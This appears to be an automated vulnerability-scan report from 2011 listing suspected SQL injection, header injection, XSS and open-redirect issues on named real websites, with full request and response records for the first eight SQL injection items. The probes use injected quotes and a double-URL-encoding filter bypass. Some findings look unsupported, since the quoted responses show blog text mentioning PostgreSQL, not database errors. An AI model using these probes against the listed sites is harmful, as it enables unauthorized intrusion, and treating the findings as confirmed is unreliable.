SiteMap

XSS, SQL Injection, HTTP Header Injection, CWE-79, CWE-89, CWE-113, DORK Report 2-27-2011

1. SQL injection

1.1. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 1]

1.2. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 2]

1.3. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 3]

1.4. http://bad-behavior.ioerror.us/blog/ [REST URL parameter 1]

1.5. http://bad-behavior.ioerror.us/category/bad-behavior/ [REST URL parameter 2]

1.6. http://bad-behavior.ioerror.us/category/bad-behavior/ [name of an arbitrarily supplied request parameter]

1.7. http://bad-behavior.ioerror.us/feed/ [name of an arbitrarily supplied request parameter]

1.8. http://bad-behavior.ioerror.us/feed/atom/ [name of an arbitrarily supplied request parameter]

1.9. https://client.trafficshaping.com/_mint/ [User-Agent HTTP header]

1.10. http://googleads.g.doubleclick.net/pagead/ads [ga_vid parameter]

1.11. http://googleads.g.doubleclick.net/pagead/ads [u_w parameter]

1.12. http://o.aolcdn.com/os_merge/ [file parameter]

1.13. http://peoplepond.com/_mint/ [MintUnique cookie]

1.14. http://shop.winamp.com/store [BIGipServerp-drh-dc1pod5-pool1-active cookie]

1.15. http://shop.winamp.com/store [JSESSIONID cookie]

1.16. http://shop.winamp.com/store [Locale parameter]

1.17. http://shop.winamp.com/store [Referer HTTP header]

1.18. http://shop.winamp.com/store [ThemeID parameter]

1.19. http://shop.winamp.com/store [name of an arbitrarily supplied request parameter]

1.20. http://shop.winamp.com/store [productID parameter]

1.21. http://shop.winamp.com/store [s_pers cookie]

1.22. http://shop.winamp.com/store [s_sess cookie]

1.23. https://shop.winamp.com/store [BIGipServerp-drh-dc1pod5-pool1-active cookie]

1.24. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/QsQtRaU6mGT.css [REST URL parameter 4]

1.25. http://www.companypond.com/ [name of an arbitrarily supplied request parameter]

1.26. http://www.dreamhost.com/r.cgi [129733 parameter]

1.27. http://www.dreamhost.com/r.cgi [name of an arbitrarily supplied request parameter]

1.28. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24/page-1/ [REST URL parameter 3]

1.29. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-25/page-1/ [REST URL parameter 3]

1.30. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-7/page-1/ [REST URL parameter 3]

2. HTTP header injection

2.1. http://ad.doubleclick.net/adj/N2998.159462.7724395940621/B4924654.4 [REST URL parameter 1]

2.2. http://ad.doubleclick.net/adj/N2998.159462.7724395940621/B5077405.10 [REST URL parameter 1]

2.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

2.4. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login [Site2pstoreToken parameter]

2.5. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

2.6. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

2.7. http://tags.crwdcntrl.net/5/c=25/b=1225394 [name of an arbitrarily supplied request parameter]

2.8. http://tags.crwdcntrl.net/5/c=25/b=1225400 [name of an arbitrarily supplied request parameter]

2.9. http://tags.crwdcntrl.net/5/c=25/b=1226041 [name of an arbitrarily supplied request parameter]

3. Cross-site scripting (reflected)

3.1. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

3.2. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

3.3. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

3.4. http://alterianwaserver.alterianconnect.net/tracking.aspx/gettoken/ [callback parameter]

3.5. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitevents/ [callback parameter]

3.6. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitsession/ [callback parameter]

3.7. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [mpt parameter]

3.8. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [mpvc parameter]

3.9. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [name of an arbitrarily supplied request parameter]

3.10. http://api.postup.com/TCTUL001/twidget/1.jsonp [jsonp parameter]

3.11. http://apps.conduit-banners.com/TechCrunchApp-Techcrunch_APP [imageurl parameter]

3.12. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.13. http://b.scorecardresearch.com/beacon.js [c10 parameter]

3.14. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.15. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.16. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.17. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.18. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.19. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.20. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [BnId parameter]

3.21. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 10]

3.22. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 11]

3.23. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 12]

3.24. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 13]

3.25. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 14]

3.26. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 15]

3.27. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 4]

3.28. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 5]

3.29. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 6]

3.30. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 7]

3.31. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 8]

3.32. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 9]

3.33. https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start [name of an arbitrarily supplied request parameter]

3.34. https://client.trafficshaping.com/signin [email parameter]

3.35. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 1]

3.36. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 1]

3.37. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 4]

3.38. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

3.39. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

3.40. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]

3.41. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]

3.42. https://event.on24.com/eventRegistration/EventLobbyServlet [key parameter]

3.43. https://event.on24.com/eventRegistration/EventLobbyServlet [partnerref parameter]

3.44. https://event.on24.com/eventRegistration/EventLobbyServlet [sourcepage parameter]

3.45. http://init.zopim.com/register [mID parameter]

3.46. http://lfov.net/webrecorder/g/chimera.js [vid parameter]

3.47. http://odb.outbrain.com/utils/get [callback parameter]

3.48. https://shop.winamp.com/DRHM/store [name of an arbitrarily supplied request parameter]

3.49. https://shop.winamp.com/store [name of an arbitrarily supplied request parameter]

3.50. http://widgets.digg.com/buttons/count [url parameter]

3.51. http://www.business-software.com/top-10-web-content-management-vendors.php [gclid parameter]

3.52. http://www.business-software.com/top-10-web-content-management-vendors.php [keyword parameter]

3.53. http://www.business-software.com/top-10-web-content-management-vendors.php [name of an arbitrarily supplied request parameter]

3.54. http://www.business-software.com/top-10-web-content-management-vendors.php [track parameter]

3.55. http://www.business-software.com/top-10-web-content-management-vendors.php [traffic parameter]

3.56. http://www.linkedin.com/cws/share-count [url parameter]

3.57. http://www.paperthin.com/_cs_apps/ajaxProxy.cfm [bean parameter]

3.58. http://www.paperthin.com/_cs_apps/ajaxProxy.cfm [method parameter]

3.59. http://www.prchecker.info/check_page_rank.php [name of an arbitrarily supplied request parameter]

3.60. http://www.prchecker.info/check_page_rank.php [urlo parameter]

3.61. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24/page-1/ [REST URL parameter 3]

3.62. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-25/page-1/ [REST URL parameter 3]

3.63. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-7/page-1/ [REST URL parameter 3]

3.64. http://www.watchmouse.com/assets/css/print.css [REST URL parameter 3]

3.65. http://www.watchmouse.com/assets/css/screen.css [REST URL parameter 3]

3.66. http://www.watchmouse.com/en/ [REST URL parameter 1]

3.67. http://www.watchmouse.com/en/ [name of an arbitrarily supplied request parameter]

3.68. http://www.watchmouse.com/en/api/checkreferrer.php [REST URL parameter 3]

3.69. http://www.winamp.com/media-player/en [REST URL parameter 2]

3.70. https://www14.software.ibm.com/webapp/iwm/web/signup.do [ck parameter]

3.71. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cm parameter]

3.72. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cmp parameter]

3.73. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cr parameter]

3.74. https://www14.software.ibm.com/webapp/iwm/web/signup.do [csr parameter]

3.75. https://www14.software.ibm.com/webapp/iwm/web/signup.do [ct parameter]

3.76. https://www14.software.ibm.com/webapp/iwm/web/signup.do [mkwid parameter]

3.77. https://www14.software.ibm.com/webapp/iwm/web/signup.do [name of an arbitrarily supplied request parameter]

3.78. https://event.on24.com/eventRegistration/EventLobbyServlet [User-Agent HTTP header]

3.79. https://login.oracle.com/mysso/signon.jsp [Referer HTTP header]

3.80. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login [Referer HTTP header]

3.81. http://telligent.com/products/request_a_demo.aspx [Referer HTTP header]

3.82. http://telligent.com/resources/m/analysts/1343205.aspx [Referer HTTP header]

3.83. http://telligent.com/resources/m/analysts/1345217.aspx [Referer HTTP header]

3.84. http://telligent.com/resources/m/success_stories/1331597.aspx [Referer HTTP header]

3.85. http://telligent.com/support/request_an_upgrade/ [Referer HTTP header]

3.86. http://www.watchmouse.com/en/ [Referer HTTP header]

3.87. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

3.88. http://seg.sharethis.com/getSegment.php [__stid cookie]

3.89. http://www.winamp.com/ [countryCookie cookie]

3.90. http://www.winamp.com/media-player/en [countryCookie cookie]

3.91. http://www.winamp.com/skin/slick-redux/222084 [countryCookie cookie]

4. Open redirection

4.1. http://r.nexac.com/e/getdata.xgi [ru parameter]

4.2. http://tags.crwdcntrl.net/5/c=25/b=1225394 [name of an arbitrarily supplied request parameter]

4.3. http://tags.crwdcntrl.net/5/c=25/b=1225400 [name of an arbitrarily supplied request parameter]

4.4. http://tags.crwdcntrl.net/5/c=25/b=1226041 [name of an arbitrarily supplied request parameter]


1. SQL injection  next
There are 30 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

1.1. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2011/01/05/bad-behavior-2-1-8/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Request

GET /2011'/01/05/bad-behavior-2-1-8/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761999+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Link: <http://bad-behavior.ioerror.us/?p=441>; rel=shortlink
Content-Length: 26787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...
1.2. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2011/01/05/bad-behavior-2-1-8/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Request

GET /2011/01'/05/bad-behavior-2-1-8/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762005+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Link: <http://bad-behavior.ioerror.us/?p=441>; rel=shortlink
Content-Length: 26787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...
1.3. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2011/01/05/bad-behavior-2-1-8/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Request

GET /2011/01/05'/bad-behavior-2-1-8/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762011+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Link: <http://bad-behavior.ioerror.us/?p=441>; rel=shortlink
Content-Length: 26788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...
1.4. http://bad-behavior.ioerror.us/blog/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /blog/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Request

GET /blog'/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:12:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761978+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 72723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...
1.5. http://bad-behavior.ioerror.us/category/bad-behavior/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /category/bad-behavior/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Request

GET /category/bad-behavior'/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762060+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 51665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...
1.6. http://bad-behavior.ioerror.us/category/bad-behavior/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /category/bad-behavior/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request

GET /category/bad-behavior/?1%2527=1 HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762019+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 51670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...
1.7. http://bad-behavior.ioerror.us/feed/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /feed/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request

GET /feed/?1%2527=1 HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:36 GMT
Content-Type: text/xml; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761895+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Last-Modified: Tue, 15 Feb 2011 06:24:42 GMT
ETag: "d0aa19c0e184cf0e188a04458920669c"
Content-Length: 41692

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:dc="http://purl.org/dc/elem
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...
1.8. http://bad-behavior.ioerror.us/feed/atom/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /feed/atom/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request

GET /feed/atom/?1%2527=1 HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:42 GMT
Content-Type: application/atom+xml; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761902+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Last-Modified: Tue, 15 Feb 2011 06:24:42 GMT
ETag: "d0aa19c0e184cf0e188a04458920669c"
Content-Length: 45367

<?xml version="1.0" encoding="UTF-8"?><feed
xmlns="http://www.w3.org/2005/Atom"
xmlns:thr="http://purl.org/syndication/thread/1.0"
xml:lang="en"
xml:base="http://bad-behavior.ioerror.us/wp-ato
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...
1.9. https://client.trafficshaping.com/_mint/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://client.trafficshaping.com
Path:   /_mint/

Issue detail

